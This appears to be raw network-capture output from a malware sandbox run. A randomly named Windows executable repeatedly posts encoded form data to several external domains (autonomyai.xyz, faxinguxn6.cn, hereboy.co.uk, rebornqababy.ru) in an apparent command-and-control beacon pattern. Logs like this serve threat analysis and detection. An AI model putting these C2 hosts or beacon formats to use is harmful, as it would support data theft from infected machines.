                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                          Timestamp: Jul 2, 2024 14:04:20.890474081 CEST | Bytes transferred: 408 | Direction: IN | Data: HTTP/1.1 200 OK
                                                          Server: openresty
                                                          Date: Tue, 02 Jul 2024 12:04:20 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 268
                                                          Connection: close
                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?mB=rL4lP&GBbljTO=WBvhIJsiSZ/Mpf8vspJrW/4pjpLKDJYga2inWWxcAarnmjt55lmBuwg8tb7lhDgj0p/kM0sabX/Eh7nxTer92pVV4vHw9Nn4rOH01OSzROy3Dd2AlIGGpSa7+8s++24x8ediPqQ="}</script></head></html>


                                                          Session ID: 21 | Source IP: 192.168.2.6 | Source Port: 49744 | Destination IP: 15.197.142.173 | Destination Port: 80 | PID: 280 | Process: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe
                                                          Timestamp: Jul 2, 2024 14:04:25.953110933 CEST | Bytes transferred: 752 | Direction: OUT | Data: POST /b2v9/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Cache-Control: max-age=0
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Content-Length: 212
                                                          Host: www.autonomyai.xyz
                                                          Origin: http://www.autonomyai.xyz
                                                          Referer: http://www.autonomyai.xyz/b2v9/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                          Data Ascii: GBbljTO=5umoC+7lxu4wou0FRM1w72+r2k4Pp8ohFXVeJyeRdQfDvIeFCSNTgx5HULQ+lw6xZGxrH5QKpSfc83gC5l1fnJL3EALOD9cGCGkX0DHdQKPRMU5J7UIcVVXSh24MfGHhZrnGzYc+4ypf41vIcdu3bxO1xPnQWdXZ2T+0ZhRV+eIVnmtRq/OMnKW48u6LkpPKi5ABH+odrEHn
                                                          Timestamp: Jul 2, 2024 14:04:26.444986105 CEST | Bytes transferred: 135 | Direction: IN | Data: HTTP/1.1 405 Not Allowed
                                                          Server: awselb/2.0
                                                          Date: Tue, 02 Jul 2024 12:04:26 GMT
                                                          Content-Length: 0
                                                          Connection: close
                                                          WAFRule: 0


                                                          Session ID: 22 | Source IP: 192.168.2.6 | Source Port: 49745 | Destination IP: 15.197.142.173 | Destination Port: 80 | PID: 280 | Process: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe
                                                          Timestamp: Jul 2, 2024 14:04:28.488751888 CEST | Bytes transferred: 776 | Direction: OUT | Data: POST /b2v9/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Cache-Control: max-age=0
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Content-Length: 236
                                                          Host: www.autonomyai.xyz
                                                          Origin: http://www.autonomyai.xyz
                                                          Referer: http://www.autonomyai.xyz/b2v9/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                          Data Ascii: GBbljTO=5umoC+7lxu4woN8FC7Zw9W+o5E4PyspqFXZeJ2OBdlPDvt6FBTNTlx5HN7Q7qQ62ZG8YH48KpSLc82QC5U1cnZL5JgLMNdcGCGkX0DS4QKHRMlJJ41IbLlXRoW4MbGHlZrmhzZQU4whf43HIcPG4VxP88vmFRP6g6SvCSXB59eEFmQsL2MOv1a268si5kJPgg54BVpk6kwiEWrnYRUrlUJRkqkhWxopaxA==
                                                          Timestamp: Jul 2, 2024 14:04:28.960928917 CEST | Bytes transferred: 135 | Direction: IN | Data: HTTP/1.1 405 Not Allowed
                                                          Server: awselb/2.0
                                                          Date: Tue, 02 Jul 2024 12:04:28 GMT
                                                          Content-Length: 0
                                                          Connection: close
                                                          WAFRule: 0


                                                          Session ID: 23 | Source IP: 192.168.2.6 | Source Port: 49746 | Destination IP: 15.197.142.173 | Destination Port: 80 | PID: 280 | Process: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe
                                                          Timestamp: Jul 2, 2024 14:04:31.029099941 CEST | Bytes transferred: 1789 | Direction: OUT | Data: POST /b2v9/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Cache-Control: max-age=0
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Content-Length: 1248
                                                          Host: www.autonomyai.xyz
                                                          Origin: http://www.autonomyai.xyz
                                                          Referer: http://www.autonomyai.xyz/b2v9/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                          Data Ascii: GBbljTO=5umoC+7lxu4woN8FC7Zw9W+o5E4PyspqFXZeJ2OBdmvDvfyFBwlTmx5HFbQ6qQ6nZG0HH4h9pQzcuEoCwHtcsZL5VQLJD9cpCHUT0DC4QKHRMmRJsUIbJlXSh24AfGHdZqObzZEu4ABf5X3Ie7m4ZxP+/vnGRP2B6Sz/SXdT9ZMFkFxXvdOvrY+/gbmNgJbkpb89GokliiaWWNT7TEe6f4J1sx4XyYo3sWiG+m2LAkn0rNtVgVSkTJ7QNjb/5C1LrBGqLL5f8jc3ZGIUrSP/bm6sr6Z/jCftjK6GUKFWhmWPg5yLtQJTW98YL6uOTE3f7qD7m+eDVuLTc8xV1T26eaYhNQxfpugv0Ehae/HWoBggo9IBde3HzISNxwSy687XAy4MOFsIJLeKdr4yWkZvY7k0SpyQUmjU4U0S4cApmsUhn5fpySEqs+ea6uzRVBdbxfR6hW7ReHsYEtvXTzTwWiE8V3RpQDqYflg6vGVT9hWhQYODST/sF/taeZ7WuUl2ygPThBiWlDXc5GcgLxB/4lRm5Xdec2b6JRJggX5MvUWXs7NUi62lry+FRXiikQTRClmeFICH1ASTKbVNPzdfp2YB8+jKmQxld+WMti8UNV8q/4Gn9+qhWg1QTtynMZTMNMR0UBQvkS9GdgF8mVWFmiHrAR95Is+lzkVx4JJJG8EUiDvOMF/90uXMKT65H0dQgnO+V7fRZsPOx3di1NoijhG1tq4wRw30+zDZo1nWAKWKntVy1uZrMYMBWfYOzhgs6FsAbFfEuEYSsxdnaGchUYO4jVxs4qT0sHV7lmmMRdhOIQ80eBJqdHSy26cXN1wcR2FD7Nuze9y7A+mKTPsNtTWbjT5WPQOgzBx6PiB3hrWdwRpUyxwOiRrtd+GtkyFsWTqEj0sKMHFaAg7JW9Myfp2A8uMVPEE6oUT8AaljkNc12nwDUh2bT2jnnRhSLxpPlF3qcNPKq6KIR7vzlSd+GXbhA8k0UrkHqd1StrPcBiRo [TRUNCATED]
                                                          Timestamp: Jul 2, 2024 14:04:31.503010988 CEST | Bytes transferred: 135 | Direction: IN | Data: HTTP/1.1 405 Not Allowed
                                                          Server: awselb/2.0
                                                          Date: Tue, 02 Jul 2024 12:04:31 GMT
                                                          Content-Length: 0
                                                          Connection: close
                                                          WAFRule: 0


                                                          Session ID: 24 | Source IP: 192.168.2.6 | Source Port: 49747 | Destination IP: 15.197.142.173 | Destination Port: 80 | PID: 280 | Process: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe
                                                          Timestamp: Jul 2, 2024 14:04:33.563081026 CEST | Bytes transferred: 484 | Direction: OUT | Data: GET /b2v9/?GBbljTO=0sOIBL6Y1M004sQ5TvZd5iz/+VJrlsE2TnBUG2Cle0uPodabdAFumCtHEYRGqgGZaXBiOoh6miWUokUDwH1uxZLkB2zaEttNK0EmqhWvcq3hRWFyql4+CgnPikYYPSDEc9yry/0=&mB=rL4lP HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Connection: close
                                                          Host: www.autonomyai.xyz
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                          Timestamp: Jul 2, 2024 14:04:34.054696083 CEST | Bytes transferred: 133 | Direction: IN | Data: HTTP/1.1 404 Not Found
                                                          Server: awselb/2.0
                                                          Date: Tue, 02 Jul 2024 12:04:34 GMT
                                                          Content-Length: 0
                                                          Connection: close
                                                          WAFRule: 5


                                                          Session ID: 25 | Source IP: 192.168.2.6 | Source Port: 49748 | Destination IP: 108.186.253.49 | Destination Port: 80 | PID: 280 | Process: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe
                                                          Timestamp: Jul 2, 2024 14:04:40.429023981 CEST | Bytes transferred: 749 | Direction: OUT | Data: POST /ofk1/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Cache-Control: max-age=0
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Content-Length: 212
                                                          Host: www.faxinguxn6.cn
                                                          Origin: http://www.faxinguxn6.cn
                                                          Referer: http://www.faxinguxn6.cn/ofk1/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                          Data Ascii: GBbljTO=MjiKGQboUN9fLvrKPLSQuBuUAXGxMth9kpOGa+qeRB6Aq3NRoUPqa6V+0wF9402BPTpzDcEb52pjayk004DxPHrPmSdDfbq9LGjDTykiZ7y0QAH4qDARSURWdogV+Zr1D49D6zpQ1Fwr9dDQxjnTahShbpyFH6BbiH8e+grwMrxSDLSJlnxQF9ZrFkIbKKxG/4TcR0HCFmLL
                                                          Timestamp: Jul 2, 2024 14:04:41.023118019 CEST | Bytes transferred: 146 | Direction: IN | Data: HTTP/1.1 403 Forbidden
                                                          Transfer-Encoding: chunked
                                                          Server: Microsoft-HTTPAPI/2.0
                                                          Date: Tue, 02 Jul 2024 12:04:37 GMT
                                                          Connection: close
                                                          Data Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session ID: 26 | Source IP: 192.168.2.6 | Source Port: 49749 | Destination IP: 108.186.253.49 | Destination Port: 80 | PID: 280 | Process: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe
                                                          Timestamp: Jul 2, 2024 14:04:43.015467882 CEST | Bytes transferred: 773 | Direction: OUT | Data: POST /ofk1/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Cache-Control: max-age=0
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Content-Length: 236
                                                          Host: www.faxinguxn6.cn
                                                          Origin: http://www.faxinguxn6.cn
                                                          Referer: http://www.faxinguxn6.cn/ofk1/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                          Data Ascii: GBbljTO=MjiKGQboUN9fJP7KDKSQ7xuXP3Gxadh5kpyGa/+OQzOArW9R6GrqWaV+tAF43U2aPTlBDZ8b5yBjay000L7wPXrB6Sd7Brq9LGjDT21FZ7q0Qx3442gSb0RVUIgV6ZruD49b6wt21H4r9YHQ/RDMNRSrFpybKP4qlX9A5gnoRo92LdTT5UxzXt5pFmQpKqxs94rcDjLlKSuo38s6V/5XQYVmdSc23jJrxg==
                                                          Timestamp: Jul 2, 2024 14:04:43.604095936 CEST | Bytes transferred: 146 | Direction: IN | Data: HTTP/1.1 403 Forbidden
                                                          Transfer-Encoding: chunked
                                                          Server: Microsoft-HTTPAPI/2.0
                                                          Date: Tue, 02 Jul 2024 12:04:41 GMT
                                                          Connection: close
                                                          Data Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session ID: 27 | Source IP: 192.168.2.6 | Source Port: 49750 | Destination IP: 108.186.253.49 | Destination Port: 80 | PID: 280
                                                          Process: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe
                                                          Timestamp: Jul 2, 2024 14:04:45.551078081 CEST | Bytes transferred: 1786 | Direction: OUT | Data: POST /ofk1/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Cache-Control: max-age=0
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Content-Length: 1248
                                                          Host: www.faxinguxn6.cn
                                                          Origin: http://www.faxinguxn6.cn
                                                          Referer: http://www.faxinguxn6.cn/ofk1/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                          Data Ascii: GBbljTO=MjiKGQboUN9fJP7KDKSQ7xuXP3Gxadh5kpyGa/+OQz2ArgJRo2XqVaV+ywFD3U2bPTt/DZ4l5wJjVxs0jK7wWnrBxydAfbrgLFLHTypFZ7q0Qzv46jASXURWdogR+ZqgD5VL6zBA13Yr943Q9inMPxStApzIKP8xlXhy5hjWRqh2Bcq5oWlyLPxqUH4WO+17yrPnHQuQGmmnus1hVectdb5IZncgxTA6jMi8eBHNAZIiSRaw8ZN+AO4MWqckw1kXsyL1zKO430QOHW7M3XiSjj+CWB7a8m2cpzJ0qYMiw0o2nvS7bm0vxs0sAFc4I0VSOE31K5k7MHKh4cIorejLieQHopDph9XX55l7x+qkvohbReQ/rb+8fPOLUaB1O6+z0ICXgNtyPF1E8DG6vHuYp1eTfYFkE7YOxMPYhzB3wzTg97Q5T/z/8x8c13BuxweMNDCO3OVH7YWk6krLD940wIrUjAIpX3Zuen6K4vGNlLNJ6qugaXL/5NdgXM/ho2+4JrbTLz74018qZ51H4In321sP/Gpz3+bElD3+0R+nSarfclLW6S8APamC0gP8c5IgOcWCFPt/1wzaFjoFEpVujnlhH/7NuWr0FlXKkqSMtK8+/m0mdxkTFQ8IUjNEguJx6KxJHP15LCYyIRcgxUcY9L//NhuA4oaYaEj0mDQdIXN6LnxD6NtFQ71WW/7p25ygfG68Kv765h6MDEJmI4D6i2a9TFN7sob0cdJgICvDSGG7kHuo3FwP0BspdcN2rbxAhywPgzapCGOaO2eeFwCMzDMo55wNgVZgLSeG4HGgRurpckoDCgZwYS8vIUDC/BnokrOqizcnFk0kyCleeC30H0dKzR49PaoT8AcAFIL2vel2dc5g2HCyZunpJ4sA6zlclCA087MDdvmOz11FGj7vwkqNXk8XC0epNXMkVMVCQoU+noP28arDzUlw0njwU0Qais1p+DC1gpRUnG9gxYs1Zg9SWYVJAssm2qS8T6v7I/Fh [TRUNCATED]
                                                          Timestamp: Jul 2, 2024 14:04:46.147147894 CEST | Bytes transferred: 146 | Direction: IN | Data: HTTP/1.1 403 Forbidden
                                                          Transfer-Encoding: chunked
                                                          Server: Microsoft-HTTPAPI/2.0
                                                          Date: Tue, 02 Jul 2024 12:04:43 GMT
                                                          Connection: close
                                                          Data Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session ID: 28 | Source IP: 192.168.2.6 | Source Port: 49751 | Destination IP: 108.186.253.49 | Destination Port: 80 | PID: 280
                                                          Process: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe
                                                          Timestamp: Jul 2, 2024 14:04:48.099148989 CEST | Bytes transferred: 483 | Direction: OUT | Data: GET /ofk1/?mB=rL4lP&GBbljTO=BhKqFmuQRptfX/n+GLbvkgrrHWTCYt1Sl5iEedmrVDCnsV4u7G/8RrJF9Ts24XSLey5WO/1p/DVfbDYr/r26W2Tj1BdpAMniD2/mHks2VLu3GzKm6FI2X0B8Walyh6GsFs9hylc= HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Connection: close
                                                          Host: www.faxinguxn6.cn
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                          Timestamp: Jul 2, 2024 14:04:48.686291933 CEST | Bytes transferred: 146 | Direction: IN | Data: HTTP/1.1 403 Forbidden
                                                          Transfer-Encoding: chunked
                                                          Server: Microsoft-HTTPAPI/2.0
                                                          Date: Tue, 02 Jul 2024 12:04:46 GMT
                                                          Connection: close
                                                          Data Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session ID: 29 | Source IP: 192.168.2.6 | Source Port: 49752 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 280
                                                          Process: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe
                                                          Timestamp: Jul 2, 2024 14:04:53.723051071 CEST | Bytes transferred: 749 | Direction: OUT | Data: POST /4ez3/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Cache-Control: max-age=0
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Content-Length: 212
                                                          Host: www.hereboy.co.uk
                                                          Origin: http://www.hereboy.co.uk
                                                          Referer: http://www.hereboy.co.uk/4ez3/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                          Data Ascii: GBbljTO=rdwsvkEyYg9jB+v6eOKorRMKC3CtnjTBpxfA0rWaaY7KQsROi+Bsu4msmlEv43InC3gq+YpAGvDSKH07aYVTkF32OcKE0VaDefSLO2gNoPmxl5jiPVe2uwyfkmQ9ot+O2cysX0eLPGFCt4nwa7b/uI6pCzc1zeQfy4KoLttXqM3y/KVt2qpF8/oCNgzwfnBuH9swYgQgctwc


                                                          Session ID: 30 | Source IP: 192.168.2.6 | Source Port: 49753 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 280
                                                          Process: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe
                                                          Timestamp: Jul 2, 2024 14:04:56.265100002 CEST | Bytes transferred: 773 | Direction: OUT | Data: POST /4ez3/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Cache-Control: max-age=0
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Content-Length: 236
                                                          Host: www.hereboy.co.uk
                                                          Origin: http://www.hereboy.co.uk
                                                          Referer: http://www.hereboy.co.uk/4ez3/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                          Data Ascii: GBbljTO=rdwsvkEyYg9jTPf6cpWo7BMVMXCtpDTNpxTA0p6KatjKTJ1Oj/Bsv4msy1Eq83IsC3kY+dRAGvXSKFs7aL9UlV3wVsKGpFaDefSLO2laoP+xloTiJ321xAyctGQ9lN+S2cy0X3a1PEtCt9bwbpj8146wGzdR+udmoebZH/Zl3//Y68U3qZpmuvIANirCfHBEF9UwK3cHTZV/r1CbjJQF09lzrjc+lMNiPg==


                                                          Session ID: 31 | Source IP: 192.168.2.6 | Source Port: 49754 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 280
                                                          Process: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe
                                                          Timestamp: Jul 2, 2024 14:04:58.828634977 CEST | Bytes transferred: 1786 | Direction: OUT | Data: POST /4ez3/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Cache-Control: max-age=0
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Content-Length: 1248
                                                          Host: www.hereboy.co.uk
                                                          Origin: http://www.hereboy.co.uk
                                                          Referer: http://www.hereboy.co.uk/4ez3/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36


                                                          Session ID: 32 | Source IP: 192.168.2.6 | Source Port: 49755 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 280
                                                          Process: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe
                                                          Timestamp: Jul 2, 2024 14:05:01.357569933 CEST | Bytes transferred: 483 | Direction: OUT | Data: GET /4ez3/?GBbljTO=mfYMsQM3KyhOB9S5RaSW2y5rLmzLgjaa/QLQwIqVV5WYQs45zP0evK7Rjl9k70QaNBAPkr49MsiTFVYwFYBU4UL5Zbi/2lnbDdmhQHx5hvKSlaviHFa+lVmdn2kx/MOS+LGOACo=&mB=rL4lP HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Connection: close
                                                          Host: www.hereboy.co.uk
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                          Timestamp: Jul 2, 2024 14:05:01.825535059 CEST | Bytes transferred: 408 | Direction: IN | Data: HTTP/1.1 200 OK
                                                          Server: openresty
                                                          Date: Tue, 02 Jul 2024 12:05:01 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 268
                                                          Connection: close
                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?GBbljTO=mfYMsQM3KyhOB9S5RaSW2y5rLmzLgjaa/QLQwIqVV5WYQs45zP0evK7Rjl9k70QaNBAPkr49MsiTFVYwFYBU4UL5Zbi/2lnbDdmhQHx5hvKSlaviHFa+lVmdn2kx/MOS+LGOACo=&mB=rL4lP"}</script></head></html>


                                                          Session ID: 33 | Source IP: 192.168.2.6 | Source Port: 49756 | Destination IP: 87.236.19.243 | Destination Port: 80 | PID: 280
                                                          Process: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe
                                                          Timestamp: Jul 2, 2024 14:05:07.146040916 CEST | Bytes transferred: 755 | Direction: OUT | Data: POST /waey/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Cache-Control: max-age=0
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Content-Length: 212
                                                          Host: www.rebornqababy.ru
                                                          Origin: http://www.rebornqababy.ru
                                                          Referer: http://www.rebornqababy.ru/waey/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                          Data Ascii: GBbljTO=iGzDLtGg+hLO0VoczZ3UXC5DoluI0JBXSxBouXvtyuyCIc35iQuuIiS1xrlk3iUlhsB7sVJkeaMt9gFOyOg5crQpLlgWSP/aBWyJghILoSPa1wPrTWoeb4VGXMVLHh0BTGNg+VK2YJL7Jq9psHvHyityb+t9Elyrm4YfB21G52QJrzxpWjGWHw8V0TMIzMOmf+CG+oTMYQxq
                                                          Timestamp: Jul 2, 2024 14:05:07.903883934 CEST | Bytes transferred: 479 | Direction: IN | Data: HTTP/1.1 404 Not Found
                                                          Server: nginx-reuseport/1.21.1
                                                          Date: Tue, 02 Jul 2024 12:05:07 GMT
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Content-Encoding: gzip


                                                          Session ID: 34 | Source IP: 192.168.2.6 | Source Port: 49757 | Destination IP: 87.236.19.243 | Destination Port: 80 | PID: 280
                                                          Process: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe
                                                          Timestamp: Jul 2, 2024 14:05:09.688976049 CEST | Bytes transferred: 779 | Direction: OUT | Data: POST /waey/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Cache-Control: max-age=0
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Content-Length: 236
                                                          Host: www.rebornqababy.ru
                                                          Origin: http://www.rebornqababy.ru
                                                          Referer: http://www.rebornqababy.ru/waey/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                          Data Ascii: GBbljTO=iGzDLtGg+hLO32Acy6fUAy5CtluIjZBLSx9ouT/9zcWCI9H5hVCudiS16LkvpSUuhrJZsRJkeaot9lhOy4o6e7QvSVgUKv/aBWyJgi0xoSXa2AfrBC0Za4VHHcVLQR0NTGNe+UXRYMX7JvZptWvA8is3f+sDMUXBjZhoNmdai0w4jlwzKQG1VgcX0RU6zsOMd+6Gs/frXkUJt3WrQ9/znAOnS9zR5ubRyQ==
                                                          Timestamp: Jul 2, 2024 14:05:10.440665960 CEST | Bytes transferred: 479 | Direction: IN | Data: HTTP/1.1 404 Not Found
                                                          Server: nginx-reuseport/1.21.1
                                                          Date: Tue, 02 Jul 2024 12:05:10 GMT
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Content-Encoding: gzip


                                                          Session ID: 35 | Source IP: 192.168.2.6 | Source Port: 49758 | Destination IP: 87.236.19.243 | Destination Port: 80 | PID: 280
                                                          Process: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe
                                                          Timestamp: Jul 2, 2024 14:05:12.219038963 CEST | Bytes transferred: 1792 | Direction: OUT | Data: POST /waey/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Cache-Control: max-age=0
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Content-Length: 1248
                                                          Host: www.rebornqababy.ru
                                                          Origin: http://www.rebornqababy.ru
                                                          Referer: http://www.rebornqababy.ru/waey/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
